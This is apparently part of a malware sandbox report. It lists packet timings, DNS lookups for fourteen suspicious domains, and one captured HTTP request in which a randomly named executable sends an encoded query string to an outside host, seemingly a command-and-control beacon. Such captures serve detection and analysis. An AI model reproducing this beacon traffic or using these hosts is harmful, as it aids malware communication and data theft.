                                                                                                                            Nov 10, 2023 09:30:40.146862030 CET8049763103.120.80.111192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:40.146893978 CET8049763103.120.80.111192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:40.146898031 CET4976380192.168.2.10103.120.80.111
                                                                                                                            Nov 10, 2023 09:30:40.146927118 CET8049763103.120.80.111192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:40.146960020 CET8049763103.120.80.111192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:40.146965027 CET4976380192.168.2.10103.120.80.111
                                                                                                                            Nov 10, 2023 09:30:40.146994114 CET8049763103.120.80.111192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:40.147031069 CET4976380192.168.2.10103.120.80.111
                                                                                                                            Nov 10, 2023 09:30:40.475420952 CET8049763103.120.80.111192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:40.475482941 CET8049763103.120.80.111192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:40.475522041 CET8049763103.120.80.111192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:40.475636959 CET4976380192.168.2.10103.120.80.111
                                                                                                                            Nov 10, 2023 09:30:40.475718975 CET4976380192.168.2.10103.120.80.111
                                                                                                                            Nov 10, 2023 09:30:40.475943089 CET4976380192.168.2.10103.120.80.111
                                                                                                                            Nov 10, 2023 09:30:40.807037115 CET8049763103.120.80.111192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:45.968787909 CET4976480192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:46.274754047 CET8049764136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:46.275110006 CET4976480192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:46.275325060 CET4976480192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:46.580848932 CET8049764136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:46.581011057 CET8049764136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:46.581224918 CET8049764136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:46.581294060 CET4976480192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:47.782306910 CET4976480192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:48.802030087 CET4976580192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:49.107798100 CET8049765136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:49.108010054 CET4976580192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:49.108351946 CET4976580192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:49.418806076 CET8049765136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:49.420788050 CET8049765136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:49.420928001 CET8049765136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:49.420975924 CET4976580192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:50.610280991 CET4976580192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:51.626295090 CET4976680192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:51.932431936 CET8049766136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:51.932539940 CET4976680192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:51.932936907 CET4976680192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:52.238821030 CET8049766136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:52.239691019 CET8049766136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:52.239742994 CET8049766136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:52.239820004 CET4976680192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:54.611151934 CET4976680192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:55.626686096 CET4976780192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:55.933092117 CET8049767136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:55.933223009 CET4976780192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:55.933465958 CET4976780192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:56.239187002 CET8049767136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:56.240942001 CET8049767136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:56.240967989 CET8049767136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:56.241123915 CET4976780192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:56.241281033 CET4976780192.168.2.10136.243.218.18
                                                                                                                            Nov 10, 2023 09:30:56.547029018 CET8049767136.243.218.18192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:01.635085106 CET4976880192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:01.940572023 CET804976891.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:01.940752029 CET4976880192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:01.942513943 CET4976880192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:02.248675108 CET804976891.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:02.248739004 CET804976891.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:02.248862982 CET4976880192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:03.454103947 CET4976880192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:04.470114946 CET4976980192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:04.777123928 CET804976991.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:04.777264118 CET4976980192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:04.777517080 CET4976980192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:05.085036039 CET804976991.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:05.085074902 CET804976991.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:05.085172892 CET4976980192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:06.282196045 CET4976980192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:07.298257113 CET4977080192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:07.603090048 CET804977091.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:07.603188992 CET4977080192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:07.603514910 CET4977080192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:07.908258915 CET804977091.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:07.909116983 CET804977091.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:07.909130096 CET804977091.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:07.909195900 CET4977080192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:09.118700981 CET4977080192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:12.559005976 CET4977180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:12.865479946 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:12.865668058 CET4977180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:12.865883112 CET4977180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:13.204938889 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.204988003 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.205024004 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.205060005 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.205069065 CET4977180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:13.205097914 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.205105066 CET4977180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:13.205136061 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.205173016 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.205178022 CET4977180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:13.205212116 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.205254078 CET4977180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:13.205266953 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.205303907 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.205352068 CET4977180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:13.512258053 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.512295008 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.512325048 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.512341976 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.512373924 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.512401104 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.512428999 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.512444973 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.512463093 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.512461901 CET4977180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:13.512474060 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.512490034 CET4977180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:13.512491941 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.512512922 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.512523890 CET4977180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:13.512530088 CET804977191.195.240.19192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:13.512552023 CET4977180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:13.512656927 CET4977180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:13.512917042 CET4977180192.168.2.1091.195.240.19
                                                                                                                            Nov 10, 2023 09:31:13.819329977 CET804977191.195.240.19192.168.2.10

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Nov 10, 2023 09:27:28.646183968 CET5979653192.168.2.101.1.1.1
                                                                                                                            Nov 10, 2023 09:27:28.956147909 CET53597961.1.1.1192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:44.986780882 CET5835553192.168.2.101.1.1.1
                                                                                                                            Nov 10, 2023 09:27:45.204215050 CET53583551.1.1.1192.168.2.10
                                                                                                                            Nov 10, 2023 09:27:58.628226042 CET5201353192.168.2.101.1.1.1
                                                                                                                            Nov 10, 2023 09:27:59.338165045 CET53520131.1.1.1192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:13.814363003 CET6054853192.168.2.101.1.1.1
                                                                                                                            Nov 10, 2023 09:28:14.107490063 CET53605481.1.1.1192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:28.830049038 CET6049853192.168.2.101.1.1.1
                                                                                                                            Nov 10, 2023 09:28:28.990993977 CET53604981.1.1.1192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:43.768142939 CET5765853192.168.2.101.1.1.1
                                                                                                                            Nov 10, 2023 09:28:43.996252060 CET53576581.1.1.1192.168.2.10
                                                                                                                            Nov 10, 2023 09:28:59.189393044 CET5939453192.168.2.101.1.1.1
                                                                                                                            Nov 10, 2023 09:28:59.389941931 CET53593941.1.1.1192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:14.721385002 CET6271253192.168.2.101.1.1.1
                                                                                                                            Nov 10, 2023 09:29:15.154055119 CET53627121.1.1.1192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:29.503151894 CET6277753192.168.2.101.1.1.1
                                                                                                                            Nov 10, 2023 09:29:29.677537918 CET53627771.1.1.1192.168.2.10
                                                                                                                            Nov 10, 2023 09:29:43.737668037 CET4956453192.168.2.101.1.1.1
                                                                                                                            Nov 10, 2023 09:29:43.937655926 CET53495641.1.1.1192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:14.079902887 CET5694053192.168.2.101.1.1.1
                                                                                                                            Nov 10, 2023 09:30:15.069221020 CET53569401.1.1.1192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:28.939727068 CET5625053192.168.2.101.1.1.1
                                                                                                                            Nov 10, 2023 09:30:29.764601946 CET53562501.1.1.1192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:45.487359047 CET5441053192.168.2.101.1.1.1
                                                                                                                            Nov 10, 2023 09:30:45.967153072 CET53544101.1.1.1192.168.2.10
                                                                                                                            Nov 10, 2023 09:31:01.251776934 CET6218353192.168.2.101.1.1.1
                                                                                                                            Nov 10, 2023 09:31:01.633452892 CET53621831.1.1.1192.168.2.10

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Nov 10, 2023 09:27:28.646183968 CET192.168.2.101.1.1.10xa2e9Standard query (0)www.aifuturesummit.comA (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:27:44.986780882 CET192.168.2.101.1.1.10x781dStandard query (0)www.littlehappiez.comA (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:27:58.628226042 CET192.168.2.101.1.1.10xb891Standard query (0)www.bellcom.mediaA (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:28:13.814363003 CET192.168.2.101.1.1.10xc2d0Standard query (0)www.tutorwave.onlineA (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:28:28.830049038 CET192.168.2.101.1.1.10x721bStandard query (0)www.diabloseugene.comA (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:28:43.768142939 CET192.168.2.101.1.1.10xa654Standard query (0)www.spark-tech-global.xyzA (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:28:59.189393044 CET192.168.2.101.1.1.10x15c4Standard query (0)www.otternaut.liveA (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:29:14.721385002 CET192.168.2.101.1.1.10x2d8aStandard query (0)www.lxdedu.comA (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:29:29.503151894 CET192.168.2.101.1.1.10xe42cStandard query (0)www.xn--4gq62f8w1alm9b.xyzA (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:29:43.737668037 CET192.168.2.101.1.1.10xf09aStandard query (0)www.autokit.helpA (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:30:14.079902887 CET192.168.2.101.1.1.10x184aStandard query (0)www.iwhrkc.shopA (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:30:28.939727068 CET192.168.2.101.1.1.10x17fcStandard query (0)www.633922.comA (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:30:45.487359047 CET192.168.2.101.1.1.10x6cebStandard query (0)www.sorenad.comA (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:31:01.251776934 CET192.168.2.101.1.1.10x7113Standard query (0)www.westcoastmedia.marketingA (IP address)IN (0x0001)false

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Nov 10, 2023 09:27:28.956147909 CET1.1.1.1192.168.2.100xa2e9No error (0)www.aifuturesummit.comaifuturesummit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:27:28.956147909 CET1.1.1.1192.168.2.100xa2e9No error (0)aifuturesummit.com84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:27:45.204215050 CET1.1.1.1192.168.2.100x781dNo error (0)www.littlehappiez.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:27:45.204215050 CET1.1.1.1192.168.2.100x781dNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:27:59.338165045 CET1.1.1.1192.168.2.100xb891No error (0)www.bellcom.media91.195.240.123A (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:28:14.107490063 CET1.1.1.1192.168.2.100xc2d0No error (0)www.tutorwave.onlinetutorwave.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:28:14.107490063 CET1.1.1.1192.168.2.100xc2d0No error (0)tutorwave.online84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:28:28.990993977 CET1.1.1.1192.168.2.100x721bNo error (0)www.diabloseugene.com199.59.243.225A (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:28:43.996252060 CET1.1.1.1192.168.2.100xa654No error (0)www.spark-tech-global.xyz162.0.222.119A (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:28:59.389941931 CET1.1.1.1192.168.2.100x15c4No error (0)www.otternaut.liveparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:28:59.389941931 CET1.1.1.1192.168.2.100x15c4No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:29:15.154055119 CET1.1.1.1192.168.2.100x2d8aNo error (0)www.lxdedu.com168.76.252.99A (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:29:29.677537918 CET1.1.1.1192.168.2.100xe42cNo error (0)www.xn--4gq62f8w1alm9b.xyz35.227.246.104A (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:29:43.937655926 CET1.1.1.1192.168.2.100xf09aNo error (0)www.autokit.helpparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:29:43.937655926 CET1.1.1.1192.168.2.100xf09aNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:30:15.069221020 CET1.1.1.1192.168.2.100x184aNo error (0)www.iwhrkc.shop5mm70f.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:30:15.069221020 CET1.1.1.1192.168.2.100x184aNo error (0)5mm70f.shop8.212.101.233A (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:30:15.069221020 CET1.1.1.1192.168.2.100x184aNo error (0)5mm70f.shop8.212.102.171A (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:30:29.764601946 CET1.1.1.1192.168.2.100x17fcNo error (0)www.633922.com103.120.80.111A (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:30:45.967153072 CET1.1.1.1192.168.2.100x6cebNo error (0)www.sorenad.com136.243.218.18A (IP address)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:31:01.633452892 CET1.1.1.1192.168.2.100x7113No error (0)www.westcoastmedia.marketingparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 10, 2023 09:31:01.633452892 CET1.1.1.1192.168.2.100x7113No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • www.aifuturesummit.com
                                                                                                                            • www.littlehappiez.com
                                                                                                                            • www.bellcom.media
                                                                                                                            • www.tutorwave.online
                                                                                                                            • www.diabloseugene.com
                                                                                                                            • www.spark-tech-global.xyz
                                                                                                                            • www.otternaut.live
                                                                                                                            • www.lxdedu.com
                                                                                                                            • www.xn--4gq62f8w1alm9b.xyz
                                                                                                                            • www.autokit.help
                                                                                                                            • www.iwhrkc.shop
                                                                                                                            • www.633922.com
                                                                                                                            • www.sorenad.com
                                                                                                                            • www.westcoastmedia.marketing

                                                                                                                            HTTP Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            0192.168.2.104971484.32.84.3280C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:27:29.171799898 CET69OUTGET /udwf/?G0Yxd2Q=Kq0jCDSsi+gLhYagIFFza5XYEfPHq1wckJYs2pUOQJ4UOA08Cv/iplAOJSGKGG8twuAeLLQOU/XInoWNJu0WYoAEZtaSTts9sg==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.aifuturesummit.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:27:29.367919922 CET71INHTTP/1.1 200 OK
                                                                                                                            Server: hcdn
                                                                                                                            Date: Fri, 10 Nov 2023 08:27:29 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 10066
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            x-hcdn-request-id: 67430418c91d3bdef8e59b62c2e54fb5-phx-edge1
                                                                                                                            Expires: Fri, 10 Nov 2023 08:27:28 GMT
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 35 2e 33 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 26 73 75 62 73 65 74 3d 63 79 72 69 6c 6c 69 63 2c 63 79 72 69 6c 6c 69 63 2d 65 78 74 2c 67 72 65 65 6b 2c 67 72 65 65 6b 2d 65 78 74 2c 6c 61 74 69 6e 2d 65 78 74 2c 76 69 65 74 6e 61 6d 65 73 65 22 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b
                                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;
                                                                                                                            Nov 10, 2023 09:27:29.367961884 CET72INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38 66 64 20 33 31 2e 31 31 25 2c 23 66 66 66 20 31 36 36 2e 30 32 25 29 7d 68 31
                                                                                                                            Data Ascii: background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-w
                                                                                                                            Nov 10, 2023 09:27:29.368074894 CET73INData Raw: 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 33 70 78 7d 2e 63 6f 6e 67 72 61 74 7a 7b 6d 61 72 67 69 6e 3a
                                                                                                                            Data Ascii: v>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bo
